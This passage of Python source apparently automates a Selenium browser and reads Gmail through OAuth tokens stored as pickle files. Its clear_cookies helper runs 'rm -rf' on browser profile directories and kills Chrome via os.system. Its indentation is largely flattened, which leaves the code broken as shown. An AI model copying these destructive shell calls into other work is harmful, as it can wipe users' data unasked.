fn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fplt = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('PARTIAL_LINK_TEXT', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
ftn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('TAG_NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fx = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('XPATH', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('CLASS_NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcsss = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('CSS_SELECTOR', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fids = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('ID', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
flts = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('LINK_TEXT', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fplts = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('PARTIAL_LINK_TEXT', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
ftns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('TAG_NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fxs = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('XPATH', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
up = lambda self, x=1: binded_list([self.key(Keys.UP) for i in range(x)])(webdriver = self)
down = lambda self, x=1: binded_list([self.key(Keys.DOWN) for i in range(x)])(webdriver = self)
left = lambda self, x=1: binded_list([self.key(Keys.LEFT) for i in range(x)])(webdriver = self)
right = lambda self, x=1: binded_list([self.key(Keys.RIGHT) for i in range(x)])(webdriver = self)
enter = lambda self, x=1: binded_list([self.key(Keys.ENTER) for i in range(x)])(webdriver = self)
zoom_out = lambda self, x=10: binded_list([self.execute_script, [(self.ctrlkey('-'), self.cmdkey('-')) for i in range(x)]])(webdriver = self)
def zoom_level(self, level = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL):
chrome_levels = [33, 50, 67, 80, 90, 100, 110, 125, 133, 150, 175, 200, 250, 300, 400, 500, 25] # edited
firefox_levels = [30, 50, 67, 80, 90, 100, 110, 120, 133, 150, 170, 200, 240, 300]
if self.driver_type == "firefox":
self.zoom_out(len(firefox_levels))
self.zoom_in(level)
elif self.driver_type == "chrome":
chrome_level = chrome_levels[level]
self.execute_script("document.body.style.zoom='{}%'".format(chrome_level))
elif self.driver_type == "phantomjs":
pass
time.sleep(1)
time.sleep(1)
return self
set_zoom_level = lambda self, x: [setattr(self, "zoom_level_idx", x), self.zoom_level(self.zoom_level_idx), self][2]
zoom_in = lambda self, x=1: binded_list([(self.ctrlkey('='), self.cmdkey('='), time.sleep(0.5)) for i in range(x)])(webdriver = self)
tab = lambda self, x=1, s=1: binded_list([[self.key(Keys.TAB), zz(s)] for i in range(x)])(webdriver = self)
key = lambda self, keys: [ActionChains(self).send_keys(keys).perform(), self][1]
ctrlkey = lambda self, keys: [ActionChains(self).key_down(Keys.CONTROL).send_keys(keys).key_up(Keys.CONTROL).perform(), self][1]
cmdkey = lambda self, keys: [ActionChains(self).key_down(Keys.COMMAND).send_keys(keys).key_up(Keys.COMMAND).perform(), self][1]
pagestop_timeout = lambda self: [self.ftn("body").send_keys(Keys.ESCAPE), self][1]
handle_alert = lambda self, x=True: [tryprocess(Alert(self).accept) if x == True else tryprocess(Alert(self).dismiss), self][1]
clear_cookies = lambda self, profile: [os.system("rm -rf ~/Library/Application\ Support/Firefox/Profiles/{}/cookies*".format([i for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile][0]))if("ch"!=profile)else([os.system("killall Google\ Chrome &>/dev/null"), time.sleep(1), os.system("rm -rf '~/Library/Application Support/Google/Chrome/Profile 1000'"), time.sleep(1), os.system("/Applications/Google\ Chrome\ 70.app/Contents/MacOS/Google\ Chrome --args --profile-directory=Profile\ 1000 &>/dev/null &"), time.sleep(1), os.system("/usr/bin/killall Google\ Chrome &>/dev/null &"), process(lambda: [time.sleep(1), os.system("/usr/bin/killall Google\ Chrome &>/dev/null &")])]), self][1]
whippin = lambda self: self
def space(self):
self.key(self.Keys.SPACE)
return self
def ffs(self,tag,attr,value, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
for e in tags:
try:
if e.get_attribute(attr) == value:
R = bind_more(e, webdriver = self)
self.batterypack.append(R)
return R
except: pass
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time:
return self.ffs(tag = tag, attr = attr, value = value, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
assert False
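        # Example (sketch; the tag/attribute/value are illustrative): find elements whose
        # attribute equals an exact value, retrying until the timeout:
        #   btn = ss.ffs("button", "data-test", "submit")    # first matching element
        #   btns = ss.ffss("button", "data-test", "submit")  # all matches, as a binded_list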
def ffss(self,tag,attr,value, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
element_list = []
for i in tags:
if i.get_attribute(attr) == value:
element_list.append(i)
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time and element_list == []:
                return self.ffss(tag = tag, attr = attr, value = value, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
R = binded_list(element_list)(webdriver = self)
self.batterypack.append(R)
return R
def ffst(self, tag, text, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag) # !!
for i in tags:
if (datetime.now() - start_time).seconds > 100:
print("over 100 refresh_every_x_seconds")
if input("continue? (y/n): ") == "n":
return
if i.text == text:
R = bind_more(i, webdriver = self)
redprint("APPEND")
self.batterypack.append(R)
return R
redprint("ffst return nothing so it should raise an Error/")
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time:
return self.ffst(tag = tag, text = text, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
assert False
def ffsts(self, tag, text, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
element_list = []
for i in tags:
if (datetime.now() - start_time).seconds > 100:
print("over 100 refresh_every_x_seconds")
if input("continue? (y/n): ") == "n":
return
if i.text == text:
element_list.append(i)
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time and element_list == []:
return self.ffsts(tag = tag, text = text, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
R = binded_list(element_list)(webdriver = self)
self.batterypack.append(R)
return R
def bacpac(self, start = False, end = False, url = None):
(setattr(self,"bacpac_urls",[]))if(None==getattr(self, "bacpac_urls", None))else()
if start == True:
self.bacpac_urls.append(self.current_url) if self.current_url not in self.bacpac_urls else ()
if end == True:
while True:
if self.current_url not in self.bacpac_urls:
self.bacpac_urls.append(self.current_url)
print("break")
break
else:
()
if url not in self.bacpac_urls:
assert_dialog(lambda: url == self.bacpac_urls.__getitem__(-1), "current url: %s\nrequired url: %s\nsomething has changed"%(self.current_url, url))
elif url in self.bacpac_urls:
print("verified)")
()
return self
def pagedowndo(self, x, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
start_time = datetime.now()
for i in range(WHILE_TRUE):
if (datetime.now() - start_time).seconds > GLOBAL_BROWSER_ELEMENT_WAIT_TIME:
assert False
if(True==x()):
self.key(self.Keys.PAGE_DOWN)
else:
self.key(self.Keys.HOME)
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
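        # Example (sketch; the condition is illustrative): press PAGE_DOWN while x() returns True
        # (and HOME otherwise), stepping until the timeout:
        #   ss.pagedowndo(lambda: "load-more" in ss.page_source)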
def arrowdowndo(self, x, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
start_time = datetime.now()
for i in range(WHILE_TRUE):
if (datetime.now() - start_time).seconds > GLOBAL_BROWSER_ELEMENT_WAIT_TIME:
assert False
if(True==x()):
self.key(self.Keys.ARROW_DOWN)
else:
self.key(self.Keys.HOME)
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def s_keys(self, elem, x, r1 = 0.2, r2 = 0.8):
elem.clear()
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
time.sleep(1)
for i in x:
elem.send_keys(i)
Q = random.uniform(r1, r2)
time.sleep(Q)
return self
def workable_from(self, element_list, command, *args, **kwargs):
x = lambda *args, **kwargs: command(*args, **kwargs)
attempt = trylmap(x, element_list)
return binded_list([element_list[i] for i in attempt if i == 0])(webdriver = self)
def html_test(self):
pyperclip.copy("")
open(homepath("~/tavern/tavern/test.html"),"w").write(self.page_source)
if "/Applications/Firefox\ 46.app" not in subprocess.getoutput("ps -ef | grep firefox | grep -v grep"):
os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin ~/tavern/tavern/test.html -foreground &")
time.sleep(4)
OSA("Firefox 46", ["cmd_l", "return", "delay 1"])
return self
def fxsxs(self, x):
g()["ELEMENT_LIST"] = []
GET_XPATHS = lambda R: R.find_elements_by_xpath("*")
def GET_MORE(x):
List = GET_XPATHS(x)
if List == []: return
                g()["ELEMENT_LIST"].extend(List)
                for i in List:
                    GET_MORE(i)
return g()["ELEMENT_LIST"]
GET_MORE(x)
R = binded_list(g()["ELEMENT_LIST"])
self.batterypack.append(R)
return R
def jcns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
S = datetime.now()
"""
x = "ui-button"
m = "click"
kws = {"text":"Close store"}
"""
# kws = dict(zip(args[0::2], args[1::2]))
t = self.execute_script("return document.getElementsByClassName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByClassName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByClassName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jcns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByClassName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByClassName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByClassName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByClassName('%s')[%s].textContent = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
"""
x = "ui-button"
m = "click"
kws = {"text":"Close store"}
idx = [5]
ss.fcns(x)[5].click() # does not work @ top of page
self.execute_script("document.getElementsByClassName('%s')[%s].click()"%(x,idx)) # works @ top of page
"""
"""
ss.get("{}/settings/account".format(self.Administrative_Url))
kws = {"text":"Close store","name":"button","data-bind-event-click":"passwordConfirmationModal.show()"}
x = "ui-button"
m = "click"
# getElementsByTagName
"""
def jtns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
# added strip to text
S = datetime.now()
# kws = dict(zip(args[0::2], args[1::2]))
redprint("_time: %s, S: %s" % (_time, S))
t = self.execute_script("return document.getElementsByTagName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByTagName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByTagName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jtns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByTagName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByTagName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByTagName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByTagName('%s')[%s].textContent = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def jns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
S = datetime.now()
# kws = dict(zip(args[0::2], args[1::2]))
t = self.execute_script("return document.getElementsByName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByName('%s')[%s].value = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def captcha_check(self):
lol = [i for i in self.ftns("iframe") if True == tryreturn(lambda: "https://www.google.com/recaptcha/api2" in i.get_attribute("src") )]
F = False
for i in lol:
self.frame(i)
try:
if "fail"==self.fcn("recaptcha-checkbox-checkmark",_time=2):
0/0
F= True
blueprint("F TRUE")
except:
self.dc()
continue
self.dc()
#if tryreturn(lambda: self.fcns("g-recaptcha",_time=4)) == 0:
if F:
OSA.display_dialog("There is a Google ReCaptcha on this page. Please complete the captcha and after the captcha is completed, click OK in this prompt. The captcha is complete when the check appears.\n\nIf there is no captcha, please ignore this message.",text_prompt=False)
return self
#bind = lambda obj,name,method: setattr(obj, name, MethodType(method,obj))
def tp(self, func, *args, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return self
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
return self
def sp(self, x):
time.sleep(x)
return self
for k,v in locals().items():
try: bind(wd, k, v)
except: pass
[wd.set_window_index(window_index[0],window_index[1],window_index[2],window_index[3]),setattr(wd,"zoom_level_idx",GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL)]if(window_index!=None and type(window_index)is(list))else(setattr(wd,"zoom_level_idx",window_index))if(window_index!=None and type(window_index)is(int))else(setattr(wd,"zoom_level_idx",GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL))
# :tmp bricks:
#if window_index and type(window_index) is list:
# wd.set_window_index(window_index[0],window_index[1],window_index[2],window_index[3])
# wd.zoom_level_idx = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL
#elif window_index and type(window_index) is int:
# wd.zoom_level_idx = window_index
#else:
# wd.zoom_level_idx = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL
def p(self,*args,**kwargs):
distinct_print(*args,**kwargs)
return self
bind3(wd,p)
def get_element_attributes(self, element):
attrs = self.execute_script('var items = {}; for (index = 0; index < arguments[0].attributes.length; ++index) { items[arguments[0].attributes[index].name] = arguments[0].attributes[index].value }; return items;', element)
return binded_list(attrs)(webdriver = self)
bind3(wd, get_element_attributes)
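        # Example (sketch): dump an element's attributes via the JS snippet above,
        # e.g. for the page body:
        #   attrs = ss.get_element_attributes(ss.ftn("body"))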
wd.execute_script1 = wd.execute_script
# :tmp bricks:
# def execute_script(self, script):
# return [self.execute_script1(script), self][1]
# bind3(self, execute_script) # you can return a string with this. so, don't bind
wd.es = wd.execute_script
wd.refresh1 = wd.refresh
def refresh(self):
try:
self.refresh1()
self.zoom_level(level=self.zoom_level_idx)
except Exception as e:
e
# timeout
self.ftn("body").send_keys(Keys.ESCAPE)
return self
bind3(wd, refresh)
wd.get1 = wd.get
wd.delete_all_cookies1 = wd.delete_all_cookies
delete_all_cookies = lambda self: [self.delete_all_cookies1(), self][1]
bind3(wd, delete_all_cookies)
def dc(self):
self.switch_to_default_content()
return self
bind3(wd, dc)
def frame(self, x):
self.switch_to_frame(x)
return self
bind3(wd, frame)
wd.switch_to_frame1 = wd.switch_to_frame
def switch_to_frame(self, x):
self.switch_to_frame1(x)
return self
wd.batterypack = []
wd.imko_on = False
wd.SHADOW = SHADOW
for i in wd.Keys.__dict__:
if not i.startswith("_"):
setattr(wd, i, eval("""lambda element: element.send_keys("%s")""" %(Keys.__dict__[i])) )
def get(self, url, timeout = GLOBAL_BROWSER_GET_PAGE_WAIT_TIME, **kwargs):
"""
if self.current_url == url:
tryprocess(lambda: self.ftn("body").send_keys(Keys.ESCAPE))
self.refresh()
return self
"""
# Proc return so not load page twice
if(0==url.startswith("http")): url="https://%s"%url
try:
self.set_page_load_timeout(timeout)
# [may not require] self.set_page_load_timeout(timeout) # so also have to deset it or else every get
start_time = datetime.now()
get_url_process = multiprocessing_process(lambda: self.get1(url))
# A. Get the url, do not wait.
# B. Start a sleep checker that terminates and ends.
# C.
# timeout_checker = multiprocessing_process(lambda: [time.sleep(timeout), get_url_process.terminate(), self.ftn("body").send_keys(self.Keys.ESCAPE)])
while True:
print("running while true anyways")
if get_url_process.is_alive() == True and ((datetime.now()-start_time).seconds < timeout):
time.sleep(0.25)
None
print(":A", (datetime.now()-start_time).seconds)
elif get_url_process.is_alive() == True and ((datetime.now()-start_time).seconds >= timeout):
time.sleep(0.25)
redprint("Terminating")
get_url_process.terminate()
redprint("get url process status: %s" % get_url_process.is_alive())
redprint("sending keys")
self.ftn("body").send_keys(Keys.ESCAPE)
redprint("sent keys")
print(":B", (datetime.now()-start_time).seconds)
                elif get_url_process.is_alive() == False and ((datetime.now()-start_time).seconds < timeout):
                    time.sleep(0.25)
                    print(":C", (datetime.now()-start_time).seconds)
                    break
                elif get_url_process.is_alive() == False and ((datetime.now()-start_time).seconds >= timeout):
                    time.sleep(0.25)
                    print(":D", (datetime.now()-start_time).seconds)
                    break
except Exception as e:
#redprint("[page_stop timeout][%s]"%e)
redprint("pageload escape")
while True:
if 0 == tryprocess(lambda: self.ftn("body").send_keys(Keys.ESCAPE)):
self.pagestop_timeout()
return self.get(url, timeout=timeout, **kwargs)
time.sleep(GLOBAL_BROWSER_PAGEGOT_WAIT_TIME)
self.zoom_level(level = self.zoom_level_idx)
# add image_compare_image here just to ensure pagegot rules
# if self.imko_checker == True:
# self.imko(part = kwargs.get("imko_part", 0))
return self
globalise(wd,"ss_v")
bind3(wd, get)
if "ch" in profile:
wd.delete_all_cookies()
if GLOBAL_BROWSER_REQUIRE_SPEEDTEST == True:
speedtest.result()
return wd
class Browser(Bowser):
""
class Emailer(object):
def get_credentials(self):
#os.makedirs(credential_path, exist_ok=True)
q = "." + "|".join([self.user, "Client_Secret_2", "GSuite"]) + ".json"
qq = "." + "|".join([self.user, "Client_Secret", "GSuite"]) + ".json"
store = oauth2client.file.Storage(homepath("~/tavern/tavern/soda/%s"%q))
print("store: %s" % store)
if q in key("filename", All(Binarydata)):
Binarydata().export(q, homepath("~/tavern/tavern/soda/%s"%q))
try:
credentials = store.get()
print("credentials: %s"%credentials)
except Exception as e:
print(e)
if 'credentials' not in locals().keys():
# the credentials here must be downloaded
Binarydata().export(qq, homepath("~/tavern/tavern/soda/%s"%(qq)))
flow = client.flow_from_clientsecrets(homepath("~/tavern/tavern/soda/%s"%(qq)), 'https://mail.google.com/')
flow.user_agent = 'Gmail API Python Send Email'
OSA.display_dialog("Your browser will be opened to authenticate credentials for gmail api. Please click OK here, your browser will open a new window. Please sign in, you will see a window that says \"%s wants to access your Google Account\". Please click Allow.\n\nNote: The same process will occur again to authenticate credentials to the google drive api." % (self.user), text_prompt = False, buttons = ["OK"])
credentials = tools.run_flow(flow, store)
print('Storing credentials to %s'%homepath("~/tavern/tavern/soda"))
if not credentials or credentials.invalid:
# the credentials here must be downloaded
Binarydata().export(qq, homepath("~/tavern/tavern/soda/%s"%(qq)))
flow = client.flow_from_clientsecrets(homepath("~/tavern/tavern/soda/%s"%(qq)), 'https://mail.google.com/')
flow.user_agent = 'Gmail API Python Send Email'
OSA.display_dialog("Your browser will be opened to authenticate credentials for gmail api. Please click OK here, your browser will open a new window. Please sign in, you will see a window that says \"%s wants to access your Google Account\". Please click Allow." % (self.user), text_prompt = False, buttons = ["OK"])
credentials = tools.run_flow(flow, store)
print('Storing credentials to %s'%homepath("~/tavern/tavern/soda"))
if q not in key("filename", All(Binarydata)):
os.chdir(homepath("~/tavern/tavern/soda/"))
Binarydata().update_or_create(q)
self.credentials = credentials
def set_service(self):
http = self.credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
self.service = service
def init(self, user):
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from oauth2client.file import Storage
from oauth2client import client, tools
from apiclient import discovery
import oauth2client
import mimetypes
import httplib2
globals().update(locals())
self.user = user
#self.credential_path = '%s/%s.json' % (credential_path, user.split('.com')[0])
#print(self.credential_path)
try:
self.__dict__.update(locals())
self.get_credentials()
self.set_service()
self.m = self.service.users().messages()
self.a = self.service.users().messages().attachments()
self.t = self.service.users().threads()
print(self.m,self.a,self.t)
except:
if GLOBAL_EMAILER_INITIALIZE_ERROR_MESSAGE:
OSA.log("Unable to initiate Emailer.",tp=False)
else:
return
def initiate_2(self,user):
user = "support@steampunkstop.com"
file = ".%s|Gmail_Client_Secret.pickle"%(user)
# below commented out
# from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from oauth2client.file import Storage
from oauth2client import client, tools
from apiclient import discovery
import oauth2client
import mimetypes
import httplib2
import base64
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://mail.google.com/']
def main():
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
# Try To Export The File
tp(lambda:Binarydata().export(file))
""" Here, use file as the file address """
if os.path.exists(file):
""" Here, use file as the file address """
with open(file, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
# if not creds or not creds.valid:
if not creds:
""" Here, make sure you have the credentials file. ~/tavern/tavern/credentials.json """
OSA().log("Here, make sure you have the credentials file. ~/tavern/tavern/credentials.json.")
shop = OSA().log("Which shop is this for? Enter the shop abbreviation")
Shop()(shop).GET_GOOGLE_API_PROJECT(user) # saves the credentials.json first and then calls Emailer which will use the credentials.json and save the authenticated pickle file.
return Emailer().initiate_2(user)
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
""" Here, use file as the file address """
with open(file, 'wb') as token:
pickle.dump(creds, token)
""" Here, use file as the file address """
Binarydata().update_or_create(file)
service = build('gmail', 'v1', credentials=creds)
# Call the Gmail API
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
return service
return main()
def set_services_initiate_2(self,user):
service = self.initiate_2(user)
self.service = service
self.m = self.service.users().messages()
self.a = self.service.users().messages().attachments()
self.t = self.service.users().threads()
print(self.m,self.a,self.t)
return self
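    # Example usage (sketch; "support@example.com" is illustrative and assumes the matching
    # Gmail credential/pickle files are already stored as Binarydata records):
    #   em = Emailer()
    #   em.set_services_initiate_2("support@example.com")
    #   em.set_messages(count=10)
    #   print(len(em.messages))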
def remove_labels(self, id, labels=['UNREAD']):
return self.m.modify(userId='me', id=id, body={'removeLabelIds':labels}).execute()
def delete_message(self, id):
x = self.t.delete(userId='me', id=id).execute()
blueprint("deleted: %s" % x)
return x
def set_messages(self, count = 50):
messages = []
original_messages = []
data = []
nextpagetoken = None
idx = 0
msg_datas = None
try:
while True:
print(nextpagetoken)
if nextpagetoken is not None:
msg_datas = self.m.list(userId='me', pageToken=nextpagetoken).execute()
elif nextpagetoken is None:
msg_datas = self.m.list(userId='me').execute()
if msg_datas == {'resultSizeEstimate': 0}:
self.messages = []
OSA.notify("No messages")
return
print(msg_datas['messages'])
print("getting more messages... idx: %s" % idx)
data.extend(msg_datas.pop('messages', []))
if 'nextPageToken' not in msg_datas.keys():
break
else:
nextpagetoken = msg_datas['nextPageToken']
idx += 1
break # works better w/ this ?
except Exception as e:
print("error: %s" % (e))
print("len data: %s" % len(data))
""" ::: Ticket is removed as of now ::: """
#existing_threads = [i.id for i in Ticket.objects.all()]
#data = [i for i in data if i['id'] not in existing_threads]
print("len new data: %s" % len(data))
print("len data: %s"% len(data))
errors = 0
"""
count=100
"""
data = data[:count]
true_ids = set()
messages_in_without = []
messages_in_without2 = []
for idx, msg in enumerate(data):
#@risky to pool api calls.
try:
# try:
# x = Emit.objects.get(true_id=msg['id'])
# redprint("[Emit.objects.get(true_id=msg['id'])] [Exists] -- ending set more messages [%s]"%msg['id'])
# #return
# except Exception as e:
# redprint("[current message id][%s][not found in Emit.objects.all()][so saving this message as a new Emit], %s"%(msg["id"],e))
print("getting message %s out of %s" % (idx+1, len(data)))
initial_data = self.m.get(userId='me',id=msg['id']).execute()
original_messages.append(initial_data)
self.original_messages = original_messages
header_data = initial_data['payload']['headers']
msg_data = {}
msg_data['id'] = initial_data['id']
msg_data['labelIds'] = initial_data['labelIds']
# skip any drafts.
if "DRAFT" in msg_data["labelIds"]:
redprint("Skipping Draft")
continue
if "SENT" in msg_data["labelIds"]:
msg_data["direction"] = 1
elif "SENT" not in msg_data["labelIds"]:
msg_data["direction"] = 0
try:
try:
msg_data['sender'] = keyequals('name', 'Return-Path', header_data)[0]['value']
except:
msg_data['sender'] = keyequals('name', 'From', header_data)[0]['value']
try:
msg_data['sender'] = re.findall(r'<(.*)>', msg_data['sender'])[0]
except:
pass
try:
msg_data['sender'] = keyequals('name', 'Reply-To', header_data)[0]['value']
msg_data['sender'] = re.findall('<(.*?@.*?>)',msg_data['sender'])[0]
print("found a reply to")
except:
pass
msg_data['receiver'] = keyequals('name', 'To', header_data)[0]['value']
try:
